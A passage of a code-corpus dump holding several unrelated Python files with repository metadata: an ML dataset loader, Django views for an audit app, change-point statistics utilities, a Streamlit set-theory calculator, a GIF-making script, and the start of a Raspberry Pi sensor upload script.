print(self.task_name,self.upsample_times[self.task_name])\n cur_data=repeat_data(cur_data,repeat_num=self.upsample_times[self.task_name])\n \n print_rank_0(f\"Per-rank number: {len(cur_data)} | split: {split} | task: {self.task_name}.\")\n print_rank_0(\"\\n\")\n source_texts, target_texts = [], []\n for data_example in cur_data:\n source_texts.append(data_example[\"inputs_pretokenized\"])\n target_texts.append(data_example[\"targets_pretokenized\"])\n return source_texts, target_texts\n\n\n \"\"\"\n current_idx = mpu.get_data_parallel_rank() % 8\n filepath = os.path.join(self.data_dir, self.task_name, split)\n dataset = load_from_disk(filepath)['train'] # version\n total_number = len(dataset)\n print_rank_0(f\"Original total number: {total_number} | split:{split} | task: {self.task_name}\")\n if total_number >= self.max_task_dataset_size:\n prompt_number = self.get_task_prompt_number(self.task_name)\n assert prompt_number is not None\n current_number = int(self.max_task_dataset_size / prompt_number)\n rng = random.Random(1234)\n random_list = rng.sample(population=list(range(total_number)),k=current_number)\n else:\n current_number = total_number\n random_list = list(range(total_number))\n start_number = int(current_idx / 8 * current_number)\n end_number = int((current_idx + 1) / 8 * current_number)\n idx_list = random_list[start_number:end_number] if (start_number != end_number) else [random_list[start_number]]\n cur_data = dataset.select(idx_list)\n print_rank_0(f\"Per-rank number: {len(cur_data)} | split: {split} | task: {self.task_name}.\")\n print_rank_0(\"\\n\")\n example_list = []\n for idx, example in enumerate(self._yield_examples(split, cur_data)):\n if (idx + 1) % 20000 == 0:\n print_rank_0(f\"Complete {idx + 1} examples\")\n example_list.append(example)\n return example_list\n \"\"\"\n \"\"\"\n def create_examples_raw(self, split, selected=False):\n\n print_rank_0(f\"Creating {split} dataset from {self.data_dir} for task {self.task_name}.\")\n \n if not self.lazy_seq2seq_loader:\n\n assert self.args.loader_scatter == 8, \"--loader_scatter should be fixed to be 8.\"\n current_idx = mpu.get_data_parallel_rank() % 8 # [0,1,2,3,4,5,6,7]\n filepath = os.path.join(self.data_dir, self.task_name, split + \".json\")\n print_rank_0(self.task_name)\n if selected:\n start = int(current_idx/8 * 100)\n end = int((current_idx + 1)/8 * 100)\n print_rank_0(split + f\"[{start}%:{end}%]\")\n split_str = split + f\"[{start}%:{end}%]\"\n elif self.task_name in list(large_t0_task_dict.keys()) and split == \"train\":\n total_num = large_t0_task_dict[self.task_name]\n start_number = int(current_idx/8 * total_num)\n end_number = int((current_idx + 1)/8 * total_num)\n print_rank_0(f\"{split}[{start_number}:{end_number}]\")\n split_str = f\"{split}[{start_number}:{end_number}]\"\n else:\n start = int(current_idx/8 * 100)\n end = int((current_idx + 1)/8 * 100)\n print_rank_0(split + f\"[{start}%:{end}%]\")\n split_str = split + f\"[{start}%:{end}%]\"\n print(f\"Begin loading file:{filepath}\")\n random_sample = False\n select = False\n # dataset = load_dataset(\"json\", data_files={split: filepath}, split=split_str,cache_dir=\"/share/zongyu/save/cache/huggingface/datasets\",download_mode='force_redownload')\n dataset = load_dataset(\"json\", data_files={split: filepath}, split=split_str,cache_dir=\"/root/.cache/huggingface/datasets\")\n # if random_sample and split == \"train\":\n # seed_ = 58 # 42,58,30,24,10\n # sample_ratio = 0.9\n # dataset.shuffle(seed=seed_)\n # data_size = len(dataset)\n # sample_num = int(sample_ratio*data_size)\n # dataset = dataset.select(list(range(sample_num)))\n # if select and split == \"train\":\n # data_size = len(dataset)\n # dataset = dataset.select(tpn2idxs[self.task_name])\n # print_rank_0(f\"Choose {len(dataset)} from {data_size} samples for {self.task_name}.\")\n example_list = []\n for idx, example in enumerate(self._yield_examples(split, dataset)):\n if (idx + 1) % 20000 == 0:\n print_rank_0(f\"Complete {idx + 1} examples\")\n example_list.append(example)\n else:\n raise NotImplementedError(\"lazy_seq2seq_loader not implemented.\")\n\n print_rank_0(f\"Creating {len(example_list)} examples for {split} of task {self.task_name}.\")\n return example_list\n \"\"\"\n\n\nclass P3Processor(DataProcessor):\n def _yield_examples(self, split, dataset):\n source_texts, target_texts = [], []\n assert \"inputs_pretokenized\" in dataset.features\n assert \"targets_pretokenized\" in dataset.features\n for data_example in dataset:\n source_text = data_example[\"inputs_pretokenized\"]\n source_texts.append(source_text)\n target_text = data_example[\"targets_pretokenized\"]\n target_texts.append(target_text)\n assert len(source_texts) == len(target_texts)\n\n eos_token = self.tokenizer.get_command('eos').token\n\n def exceed_maximum_length(prev_inputs, inputs, max_seq_len, is_source, mask_token_index):\n assert isinstance(prev_inputs, str) and isinstance(inputs, str)\n prev_tok = self.tokenizer.EncodeAsIds(prev_inputs).tokenization\n assert len(prev_tok) <= max_seq_len\n tok = self.tokenizer.EncodeAsIds(inputs).tokenization\n\n if len(tok) >= max_seq_len - 2:\n tok = tok[:(max_seq_len - 2)]\n inputs = self.tokenizer.DecodeIds(tok)\n\n if self.args.t0_format == \"lm_format\":\n if len(prev_tok) + len(tok) < max_seq_len - 2:\n ret_inputs = prev_inputs + (inputs + eos_token)\n return False, ret_inputs\n else:\n ret_inputs = prev_inputs\n return True, ret_inputs\n\n elif self.args.t0_format == \"denoise_format\":\n if len(prev_tok) + len(tok) < max_seq_len - 2:\n mask_token = self.tokenizer.get_command(f\"MASK{mask_token_index}\").token\n if is_source:\n ret_inputs = prev_inputs + (inputs + mask_token + eos_token)\n return False, ret_inputs\n else:\n ret_inputs = prev_inputs + (mask_token + inputs + eos_token)\n return False, ret_inputs\n else:\n ret_inputs = prev_inputs\n return True, ret_inputs\n else:\n raise ValueError(\"Unknown format.\")\n\n if not self.args.packing:\n if self.args.t0_format == \"lm_format\":\n for idx, (source_text, target_text) in enumerate(zip(source_texts, target_texts)):\n guid = \"%s-%s\" % (split, idx)\n meta = {\"ref\": self.tokenizer.DecodeIds(self.tokenizer.EncodeAsIds(target_text).tokenization)}\n example = InputExample(guid=guid, text_a=source_text, text_b=target_text, meta=meta)\n if idx < 3:\n print_rank_0((source_text.encode('utf-8'), target_text.encode('utf-8'), meta[\"ref\"].encode('utf-8')))\n yield example\n elif self.args.t0_format == \"denoise_format\":\n raise NotImplementedError(\"Not implemented denoise_format for non-packing.\")\n else:\n raise NotImplementedError(\"Not implemented format.\")\n else:\n print_rank_0(\"Packing data.\")\n assert self.args.t5_model, \"Only implement packing for T5Model.\"\n packed_source_texts, packed_target_texts = [], []\n cur_src_texts = \"\"\n cur_tgt_texts = \"\"\n mask_index = 0\n for source_text, target_text in tqdm(zip(source_texts, target_texts)):\n src_flag, temp_src = exceed_maximum_length(cur_src_texts, source_text, self.max_src_len,\n is_source=True, mask_token_index=mask_index)\n tgt_flag, temp_tgt = exceed_maximum_length(cur_tgt_texts, target_text, self.max_tgt_len,\n is_source=False, mask_token_index=mask_index)\n if (not src_flag) and (not tgt_flag):\n cur_src_texts = temp_src\n cur_tgt_texts = temp_tgt\n mask_index += 1\n else:\n packed_source_texts.append(cur_src_texts)\n packed_target_texts.append(cur_tgt_texts)\n mask_index = 0\n _, cur_src = exceed_maximum_length(\"\", source_text, self.max_src_len,is_source=True,\n mask_token_index = mask_index)\n _, cur_tgt = exceed_maximum_length(\"\", target_text, self.max_tgt_len,is_source=False,\n mask_token_index = mask_index)\n cur_src_texts = cur_src\n cur_tgt_texts = cur_tgt\n\n for idx, (source_text, target_text) in enumerate(zip(packed_source_texts, packed_target_texts)):\n guid = \"%s-%s\" % (split, idx)\n meta = {\"ref\": self.tokenizer.DecodeIds(self.tokenizer.EncodeAsIds(target_text).tokenization)}\n example = InputExample(guid=guid, text_a=source_text, text_b=target_text, meta=meta)\n if idx < 3:\n print_rank_0((source_text.encode('utf-8'), target_text.encode('utf-8'), meta[\"ref\"].encode('utf-8')))\n yield example\n\n\n\nclass P3Dataset(Dataset):\n def __init__(self, args, task_name, split, tokenizer, is_training=True, rng=None):\n self.args = args\n self.task = task_name\n self.t5_model = args.t5_model\n self.max_src_length, self.max_tgt_length = args.multi_src_seq_length, args.multi_tgt_seq_length\n self.split = split\n self.tokenizer = tokenizer\n self.dataset_name = split\n self.is_training = is_training\n self.rng = rng\n \n \"\"\"\n self.processor = P3Processor(self.args, self.task, tokenizer, lazy_seq2seq_loader=False)\n example_list = self.processor.create_examples(split)\n self.example_list = example_list\n self.examples = {example.guid: example for example in example_list}\n \"\"\"\n\n self.processor = DataProcessor(self.args, self.task, tokenizer, lazy_seq2seq_loader=False)\n self.source_texts, self.target_texts = self.processor.create_examples(split,rng)\n\n print_rank_0(f\"Return {len(self.source_texts)} {split} examples for task {task_name}.\")\n\n def __len__(self):\n return len(self.source_texts)\n\n def __getitem__(self, idx):\n # example = self.example_list[idx]\n source_text, target_text = self.source_texts[idx], self.target_texts[idx]\n pad_id = self.tokenizer.get_command('pad').Id\n sop_id = self.tokenizer.get_command('sop').Id\n\n if self.t5_model:\n eos_id = self.tokenizer.get_command('eos').Id\n # source_text, target_text = example.text_a, example.text_b\n\n if not self.args.packing:\n source_tokens = self.tokenizer.EncodeAsIds(source_text).tokenization\n if len(source_tokens) > self.max_src_length - 1:\n source_tokens = source_tokens[: (self.max_src_length - 1)]\n source_tokens = source_tokens + [eos_id]\n else:\n source_tokens = self.tokenizer.EncodeAsIds(source_text).tokenization\n\n attention_mask = [1] * len(source_tokens)\n if len(source_tokens) < self.max_src_length:\n pad_length = self.max_src_length - len(source_tokens)\n source_tokens = source_tokens + [pad_id] * pad_length\n attention_mask = attention_mask + [0] * pad_length\n\n # if self.split == \"train\" or self.split == \"validation\":\n if self.is_training:\n if not self.args.packing:\n target_tokens = self.tokenizer.EncodeAsIds(target_text).tokenization\n if len(target_tokens) > self.max_tgt_length - 1:\n target_tokens = target_tokens[: (self.max_tgt_length - 1)]\n target_tokens = target_tokens + [eos_id]\n else:\n target_tokens = self.tokenizer.EncodeAsIds(target_text).tokenization\n\n loss_mask = [1] * len(target_tokens)\n if len(target_tokens) < self.max_tgt_length:\n pad_length = self.max_tgt_length - len(target_tokens)\n target_tokens = target_tokens + [pad_id] * pad_length\n loss_mask = loss_mask + [0] * pad_length\n\n sample = {'text': np.array(source_tokens, dtype=np.int64),\n 'target': np.array(target_tokens, dtype=np.int64),\n 'attention_mask': np.array([[attention_mask]], dtype=np.int64),\n 'loss_mask': np.array(loss_mask, dtype=np.int64),\n #\"uid\": example.guid\n }\n else:### TODO: test sets of training tasks are not used.\n sample = {\n 'text': np.array(source_tokens, dtype=np.int64),\n 'attention_mask': np.array([[attention_mask]], dtype=np.int64),\n # \"uid\": example.guid\n }\n else:\n eop_id = self.tokenizer.get_command('eop').Id\n pvp = P3PVP(self.tokenizer,\n max_src_length=self.max_src_length,\n max_tgt_length=self.max_tgt_length,\n task_mask=self.args.task_mask)\n mask_id = pvp.mask_id\n source_tokens, target_text = pvp.encode(example)\n\n if len(source_tokens) < self.max_src_length:\n source_tokens = source_tokens + [pad_id] * (self.max_src_length - len(source_tokens))\n sep = len(source_tokens)\n position_ids = list(range(len(source_tokens)))\n block_position_ids = [0] * len(source_tokens)\n mask_pos = source_tokens.index(mask_id)\n\n # if self.split == 'train' or self.split == \"validation\":\n if self.is_training:\n target_tokens = self.tokenizer.EncodeAsIds(\" \" + target_text).tokenization\n target_tokens = target_tokens + [eop_id]\n\n if len(target_tokens) > self.max_tgt_length:\n target_tokens = target_tokens[:self.max_tgt_length]\n loss_mask = [1] * len(target_tokens)\n\n if len(target_tokens) < self.max_tgt_length:\n loss_mask += [0] * (self.max_tgt_length - len(target_tokens))\n target_tokens += [pad_id] * (self.max_tgt_length - len(target_tokens))\n\n tokens = source_tokens + [sop_id] + target_tokens[:-1]\n loss_mask = [0] * len(source_tokens) + loss_mask\n target_ids = [0] * len(source_tokens) + target_tokens\n position_ids += [mask_pos] * len(target_tokens)\n if self.args.no_block_position:\n block_position_ids += [1] * len(target_tokens)\n else:\n block_position_ids += list(range(1, len(target_tokens) + 1))\n position_ids = [position_ids, block_position_ids]\n sample = {'text': np.array(tokens, dtype=np.int64),\n 'target': np.array(target_ids, dtype=np.int64),\n 'attention_mask': np.array(sep, dtype=np.int64),\n 'loss_mask': np.array(loss_mask, dtype=np.int64),\n \"position_id\": np.array(position_ids, dtype=np.int64),\n \"uid\": example.guid}\n else:\n tokens = source_tokens + [sop_id]\n position_ids = position_ids + [mask_pos]\n block_position_ids = block_position_ids + [1]\n position_ids = [position_ids, block_position_ids]\n sample = {'text': np.array(tokens, dtype=np.int64),\n 'attention_mask': np.array(sep, dtype=np.int64),\n \"position_id\": np.array(position_ids, dtype=np.int64),\n \"uid\": example.guid}\n return sample\n","repo_name":"zhouj8553/Improving-T0","sub_path":"tasks/p3/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":24438,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"32425637186","text":"from django.shortcuts import render,redirect,get_object_or_404,reverse\n# from customers.models import Mapping\nfrom audtech_analytics.models import Engagement,FinalTable,CompanyInfo\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.files.storage import FileSystemStorage\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.auth.decorators import permission_required\nimport pandas as pd\nimport pdfkit \nfrom django.conf import settings\nfrom django_pandas.io import read_frame\nfrom django.contrib.auth.models import Permission,Group\nfrom customers.forms import EngagementForm,CreateUserForm,companyinfo\nfrom django.db.models.functions import Cast\nfrom tenant_schemas.utils import schema_context\nfrom django.contrib import messages\n# Create your views here.\n\ndef main_page(request):\n return render(request,'index2.html')\ndef PermissionDenied(request):\n return render(request,'PermissionDenied.html')\n# def form(request):\n# return render(request,'alertcreated.html')\n\n\n \ndef CompanyInformation(request):\n context={}\n if request.method == 'GET':\n context['username']=request.session.get('username')\n form = companyinfo()\n context['form']=form\n return render(request,'companyinfo.html',context)\n elif request.method ==\"POST\":\n with schema_context(request.session.get('schema_name')):\n form = companyinfo(request.POST,request.FILES)\n if form.is_valid():\n New=form.save(commit=False)\n New.user_id=request.session.get('username')\n New.logo=request.FILES.get(\"logo\")\n New.save()\n return redirect('/home2')\n else:\n messages.error(request,str(form.errors.as_text()))\n return render(request,'companyinfo.html',context)\n\ndef navbar(request):\n context={}\n context['username']=request.session.get('username')\n context['customer']=request.session.get('schema_name')\n context['logo']=request.session.get(\"logo\")\n return render(request,'nav.html',context)\ndef handler404(request):\n return render(request, '404.html', status=404)\ndef handler500(request):\n return render(request, '404.html', status=404)\ndef DisplayData(request):\n context={}\n if request.method==\"GET\": \n with schema_context(request.session.get('schema_name')): \n context['objects']=(pd.DataFrame(read_frame(FinalTable.objects.all()))).to_html()\n return render(request,'showdata.html',context)\ndef pdfconvertor(request):\n pdfkit.from_url(settings.BASE_DIR+'/templates/'+'analytics.html', 'out.pdf')\n return HttpResponse(\"'out.pdf'\")\ndef Home(request):\n context={}\n context['logo']=request.session.get(\"logo\")\n context['clientname']=request.session.get('clientname')\n context['engangement']=request.session.get('engangement')\n context['username']=request.session.get('username')\n context['customer']=request.session.get('schema_name')\n with schema_context(request.session.get('schema_name')):\n details=Engagement.objects.filter(user_id=request.session.get('username'))\n context['details']=details\n return render(request,'home.html',context)\ndef Home2(request):\n context={}\n context['logo']=request.session.get(\"logo\")\n context['clientname']=request.session.get('clientname')\n context['username']=request.session.get('username')\n context['engangement']=request.session.get('engangement')\n context['customer']=request.session.get('schema_name')\n with schema_context(request.session.get(\"schema_name\")):\n CL=CompanyInfo.objects.get(name=request.session.get(\"schema_name\"))\n uploaded_file_url = CL.logo.url\n request.session['logo']=uploaded_file_url\n print(request.session.get('logo'))\n details=User.objects.all()\n context['details']=details\n return render(request,'home2.html',context)\n# return render(request,'NewClient.html',context)\n# def ERPMap (request):\n# context={}\n# context['engangement']=request.session.get(\"engangement\")\n# context['username']=request.session.get('username')\n# context['customer']=request.session.get('schema_name')\n# if request.method == 'GET':\n# form = ERPform()\n# context['form']=form\n# return render(request,'ERPForm.html',context)\n# elif request.method =='POST':\n# form = ERPform(request.POST,request.FILES)\n# print(form)\n# if form.is_valid():\n# #obj=form.save(commit=False)\n# form=ERPform()\n# context['form']=form\n# obj=Mapping.objects.create(source_filed=request.POST.get(\"source_filed\"),final_field=request.POST.get(\"final_field\"),transaction_type=request.POST.get(\"transaction_type\"),erp=request.POST.get(\"erp\"))\n# data=Mapping.objects.filter(erp=request.POST.get('erp'))\n# context['data']=data\n# return render(request,'ERPForm.html',context)\n# else:\n# context['form']=form\n# return render(request,'ERPForm.html',context)\n\nfrom django.views.generic.edit import UpdateView\ndef CreateUser (request):\n context={}\n context['username']=request.session.get('username')\n context['customer']=request.session.get('schema_name')\n context['clientname']=request.session.get(\"clientname\")\n if request.method == 'GET':\n with schema_context(request.session.get('schema_name')):\n form = CreateUserForm()\n context['form']=form\n return render(request,'createuser.html',context)\n elif request.method == 'POST':\n with schema_context(request.session.get('schema_name')):\n form = CreateUserForm(request.POST)\n if form.is_valid():\n # if request.POST.get(\"username\").isspace():\n # return HttpResponse(\"ytuusywys\")\n user=form.save(commit=False)\n # user.refresh_from_db()\n user.save()\n # group=Group.objects.get(id=request.POST.get('groups'))\n for i in request.POST.getlist('user_permissions'):\n permission = Permission.objects.get(name =i)\n # group.permissions.add(permission)\n user = User.objects.get(username=request.POST.get('username'))\n user.user_permissions.add(permission)\n user=user.id\n # group.user_set.add(user)\n return redirect('/home2')\n else:\n messages.error(request,str(form.errors.as_text())) \n form = CreateUserForm()\n context['form']=form\n return render(request,'createuser.html',context)\n# class UserInformation(request)\n \n# @permission_required(\"audtech_analytics.add_engagement\",login_url='/PermissionDenied')\ndef EngagementDATA(request):\n context={}\n context['logo']=request.session.get(\"logo\")\n context['username']=request.session.get('username')\n context['customer']=request.session.get('schema_name')\n if request.method == 'GET':\n with schema_context(request.session.get('schema_name')):\n form = EngagementForm()\n context['form']=form\n return render(request,'NewClient.html',context)\n elif request.method =='POST':\n with schema_context(request.session.get('schema_name')):\n form = EngagementForm(request.POST,request.FILES)\n if form.is_valid():\n obj=form.save(commit=False)\n request.session[\"engangement\"]=request.POST.get(\"engagement_name\")\n request.session[\"clientname\"]=request.POST.get('name')\n request.session[\"Currency\"]=request.POST.get('Currency')\n request.session[\"start_month\"]=request.POST.get('fiscal_start_month').strip('/')\n request.session[\"end_month\"]=request.POST.get('fiscal_end_month').strip('/')\n # request.session[\"erp\"]=request.POST.get(\"financial_management_system\")\n obj.user_id=request.session.get('username')\n obj.save()\n user=User.objects.get(username=request.session.get('username'))\n print(user)\n if user.has_perm(\"audtech_analytics.is_import\"):\n return redirect('/processfile')\n else:\n return redirect(\"/home\")\n else:\n context['form']=form\n return render(request,'NewClient.html',context)\n return render(request,'NewClient.html',context)\n\n\n\n\n","repo_name":"Rishitosh210/oldDBAnalyst","sub_path":"audtech_analytics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40914521466","text":"import numpy as np\nimport warnings\nimport matplotlib.pyplot as plt\n\n\ndef isCPvector(tau, N, K):\n \"\"\"\n Given tau an array of potential CP vectors, check whether these potential CP vectors\n are actually CP vectors as defined above\n \"\"\"\n assert K + 1 <= N\n length = tau.shape[-1] == K + 2\n is_sorted = np.all(tau[..., :-1] < tau[..., 1:])\n init = (tau[..., 0] == -1).all()\n last = (tau[..., -1] == N - 1).all()\n return length and is_sorted and init and last\n\n\ndef eta(N, k, tau_det):\n \"\"\"\n Return eta_k as defined in [§2.2, Article]\n \"\"\"\n assert k >= 1\n indices = np.arange(N)\n return (1 / (tau_det[k] - tau_det[k - 1])) * (tau_det[k - 1] < indices) * (\n indices <= tau_det[k]\n ) - (1 / (tau_det[k + 1] - tau_det[k])) * (tau_det[k] < indices) * (\n indices <= tau_det[k + 1]\n )\n\n\ndef decompose(N, k, Sigma, tau_det, X):\n \"\"\"\n Given a signal X, returns a,b as defined in [§3.1, Article]\n \"\"\"\n eta_k = eta(N, k, tau_det)\n assert not np.isnan(eta_k).any()\n c = Sigma @ eta_k / (np.dot(eta_k, Sigma @ eta_k))\n return (X - np.dot(eta_k, X) * c), c\n\n\ndef get_QF_C(a, b, tau, kappa):\n \"\"\"\n Compute the coefficient of the quadratic form z -> C(x(z)_{tau_{kappa-1}+1:tau_kappa})\n as used in [(11), Article]\n \"\"\"\n # sum_i b_i**2 z**2 + 2za_ib_i + a_i**2 - (e - s + 1) * (mean(a)**2 + 2 * mean(a)mean(b)z + mean(b)**2 z**2)\n assert kappa >= 1\n assert kappa < len(tau)\n s = tau[kappa - 1] + 1\n e = tau[kappa]\n if e == s:\n return np.zeros(3)\n\n coeff = np.empty(3)\n cov_matrix = np.cov(np.stack([a[s : e + 1], b[s : e + 1]]))\n assert s < e\n assert not np.isnan(cov_matrix).any(), (s, e)\n coeff[0] = (e - s + 1) * cov_matrix[1, 1] # np.var(b[s:e+1]) = dom coeff\n coeff[2] = (e - s + 1) * cov_matrix[0, 0] # np.var(a[s:e+1])\n coeff[1] = 2 * (e - s + 1) * cov_matrix[0, 1] # np.corrcoef(a[s:e+1], b[s:e+1])\n assert not np.isnan(coeff).any()\n return coeff\n\n\ndef get_QF(n, k, a, b, tau):\n return np.sum(\n np.stack([get_QF_C(a, b, tau, kappa) for kappa in range(1, k + 2)], axis=0),\n axis=0,\n )\n\n\ndef eval_poly(coeffs, z):\n \"\"\"\n Given coeffs a matrix of shape (*, 3) where each row represents the coefficients of a quadratic form,\n eval those quadratic forms at point z\n \"\"\"\n return coeffs[..., 0] * z ** 2 + coeffs[..., 1] * z + coeffs[..., 2]\n\n\ndef compute_break_points(a, b, c, z_u):\n \"\"\"\n Compute the set of breakpoints appearing in [Lemma 1, Report]\n \"\"\"\n Delta = b ** 2 - 4 * a * c\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n sol = (-b - np.sqrt(Delta)) / (2 * a)\n\n degree_one = np.logical_and(np.isclose(a, 0), ~np.isclose(b, 0))\n sol[degree_one] = -c[degree_one] / b[degree_one]\n\n degree_zero = np.logical_and(np.isclose(a, 0), np.isclose(b, 0))\n sol[degree_zero] = float(\"nan\")\n\n condition = np.logical_and(sol > z_u, np.logical_not(np.isnan(sol)))\n condition = np.logical_and(condition, Delta > 0)\n sol[np.logical_not(condition)] = float(\"inf\")\n\n return sol\n\n\ndef next_break_point(a, b, c, z_u):\n \"\"\"\n Perform one step of [Lemma 1, Report]\n \"\"\"\n breakpoints = compute_break_points(a, b, c, z_u)\n\n break_ind = np.argmin(breakpoints, axis=None)\n break_val = np.min(breakpoints)\n\n if break_val == float(\"inf\"):\n return None\n\n check_atol = 1e-8\n check_rtol = 1e-7\n if (\n not np.sum(\n np.isclose(\n breakpoints,\n break_val * np.ones_like(breakpoints),\n atol=check_atol,\n rtol=check_rtol,\n )\n )\n == 1\n ):\n print(breakpoints, break_val)\n indices = np.isclose(\n breakpoints,\n break_val * np.ones_like(breakpoints),\n atol=check_atol,\n rtol=check_rtol,\n ).nonzero()\n indices = indices[0]\n x = np.linspace(break_val - 1, break_val + 1)\n for ind in indices:\n plt.plot(x, a[ind] * x ** 2 + b[ind] * x + c[ind], label=str(ind))\n plt.legend()\n plt.show()\n\n assert (\n np.sum(\n np.isclose(\n breakpoints,\n break_val * np.ones_like(breakpoints),\n atol=check_atol,\n rtol=check_rtol,\n )\n )\n == 1\n )\n\n assert np.isclose(\n eval_poly(np.array([a[break_ind], b[break_ind], c[break_ind]]), break_val),\n 0,\n atol=1e-8,\n ), (\n eval_poly(np.array([a[break_ind], b[break_ind], c[break_ind]]), break_val),\n np.array([a[break_ind], b[break_ind], c[break_ind]]),\n break_val,\n )\n return (break_ind, break_val)\n\n\ndef lex_min(arr):\n \"\"\"\n Given arr a matrix, find the minimal row for the lexicographic order\n \"\"\"\n min_row = arr[0]\n min_index = 0\n for i, row in enumerate(arr):\n j = 0\n while min_row[j] == row[j] and j < len(min_row) - 1:\n j += 1\n if min_row[j] > row[j]:\n min_row = row\n min_index = i\n return min_index, min_row\n\n\ndef is_lex_leq(arr, comp_row):\n \"\"\"\n Given arr a matrix and comp_row a vector, test whether each row of arr\n is <= comp_row in lexicographic order\n \"\"\"\n n, deg = arr.shape\n assert comp_row.shape == (deg,)\n\n is_leq = np.ones(n, dtype=bool)\n for i, row in enumerate(arr):\n j = 0\n while comp_row[j] == row[j] and j < deg - 1:\n j += 1\n assert comp_row[j] != row[j] or j == deg - 1\n is_leq[i] = row[j] <= comp_row[j]\n\n return is_leq\n\n\ndef invert_deg_one(arr, index=1):\n \"\"\" Reverse the second column of the matrix arr \"\"\"\n new_arr = np.copy(arr)\n new_arr[..., index] = -new_arr[..., index]\n return new_arr","repo_name":"tobyj2/time-series-class-project","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"43320462762","text":"\nimport TCVar # Teoría de conjuntos variables\nimport DS # Depurador de String\nimport OperadorS\nimport streamlit as st\n\n\ndef Info():\n st.write(\n \"\"\"\n * Número de uniones: {}\n * Numero de intersecciones: {}\n * Numero de diferencias: {}\n * Numero de diferencias simétricas: {}\n * Pares de parentesis: {} \n * Numero de operaciones: {}\n \"\"\".format(\n TCVar.N_Un, TCVar.N_I, TCVar.N_D, TCVar.N_DS,\n TCVar.N_PP, TCVar.N_Total\n )\n )\n\n\ndef Inicio():\n st.write(\n \"\"\"\n Operaciones entre conjuntos:\n * Unión -> un\n * Intersección -> in\n * Diferencia -> di\n * Complemento -> UdiA\n * Diferencia simétrica -> ds\n\n Para realizar varias operaciones debes usar parentesis.\n \n Ejemplo:\n\n * (AunB)diC\n * Ain(CdsB)\n * ((AunB)in(CinB))un(AdiB)\n ## Conjuntos: \n ### U = {}\n ### A = {}\n ### B = {}\n ### C = {}\n \"\"\".format(TCVar.U, TCVar.A, TCVar.B, TCVar.C)\n )\n\n\ndef VaciarVariables():\n TCVar.N_Un = 0 # uniones\n TCVar.N_I = 0 # intersecciones\n TCVar.N_D = 0 # diferencias\n TCVar.N_DS = 0 # diferencias simétricas\n TCVar.N_Total = 0 # total de operaciones\n TCVar.N_PP = 0 # Numero de pares de parentesis\n\n\nst.title('Teoría de Conjuntos')\n\nInicio()\n\ntex_input = st.text_input('Ingrese la op:')\n\nif len(tex_input) != 0:\n # Return Bool, String\n verificadorS, op = DS.DepuradorString(tex_input)\n if verificadorS:\n if len(op) == 1:\n st.write('Operación: ')\n st.write(\n \"\"\"\n ## {} = {}\n \"\"\".format(op, TCVar.SolicitarConjunto(op))\n )\n VaciarVariables()\n else:\n #S, V, Data = OperadorS.SeparadorOperaciones(op)\n S, V = OperadorS.SeparadorOperaciones(op)\n st.write(\n \"\"\"\n ### Operación: \n ## {} = {}\n \"\"\".format(S, V)\n )\n #st.markdown(Data.to_markdown())\n VaciarVariables()\n OperadorS.Data = None\n else:\n st.write(op)\n VaciarVariables()\n OperadorS.Data = None\nelse:\n VaciarVariables()\n OperadorS.Data = None\n","repo_name":"plao2411p/webapp_TC","sub_path":"app/TeoriaConjuntos.py","file_name":"TeoriaConjuntos.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1024062155","text":"import argparse\nfrom glob import glob\nfrom PIL import Image\nimport pandas as pd\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('path', type=str)\n args = parser.parse_args()\n\n image_filenames = glob(f'{args.path}/*.png')\n\n df = pd.DataFrame(columns=['image_filename'])\n df['image_filename'] = image_filenames\n df['id'] = df['image_filename'].apply(lambda x: str(x).split('/')[-1].split('_')[0])\n df['organ'] = df['image_filename'].apply(lambda x: str(x).split('/')[-1].split('_')[1])\n df['fold'] = df['image_filename'].apply(lambda x: int(str(x).split('/')[-1].split('_')[2].replace('fold', '')))\n df['epoch'] = df['image_filename'].apply(lambda x: int(str(x).split('/')[-1].split('_')[3].replace('epoch', '')))\n\n for image_id, df_image in df.groupby('id'):\n df_image = df_image.sort_values(by='epoch', ascending=True).reset_index(drop=True)\n frames = (Image.open(f) for f in df_image['image_filename'])\n frame = next(frames)\n frame.save(\n fp=f'/home/gunes/Desktop/{image_id}.gif',\n format='GIF',\n append_images=frames,\n save_all=True,\n duration=30,\n loop=0\n )\n","repo_name":"gunesevitan/hubmap-hpa-hacking-the-human-body","sub_path":"src/utilities/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"30861929599","text":"#!/usr/bin/env python3\r\nimport serial\r\nimport time\r\nfrom datetime import datetime\r\nimport http.client\r\nimport json\r\nimport sys\r\nimport requests\r\nimport Seeed_AMG8833\r\nimport os\r\nimport picamera\r\nimport base64\r\nimport subprocess\r\nfrom datetime import datetime\r\nimport json\r\nfrom board import SCL, SDA\r\nimport busio\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nimport adafruit_ssd1306\r\n\r\narduino=serial.Serial('/dev/ttyUSB0', baudrate = 9600, timeout= 1)\r\ntime.sleep(3)\r\nbody=\"\"\r\nnumPoints = 1\r\ndataList = [0] * numPoints\r\nheaders = {'Accept-Charset': 'utf-8','Content-Type': 'application/json'}\r\n\r\nURL = \"http://47.56.85.130:18888/uimg\"\r\nPARAMS = {'n': 'f348'}\r\n\r\nos.putenv('SDL_FBDEV', '/dev/fb1')\r\nsensor = Seeed_AMG8833.AMG8833()\r\n\r\nlogfile = open('updatedata.log', 'a')\r\ntimestamp = datetime.now()\r\nprint(\"[\" + timestamp.strftime('%d-%b-%Y %H:%M:%S') + \"] Sensing data start.\", file = logfile)\r\nlogfile.close()\r\ncamera 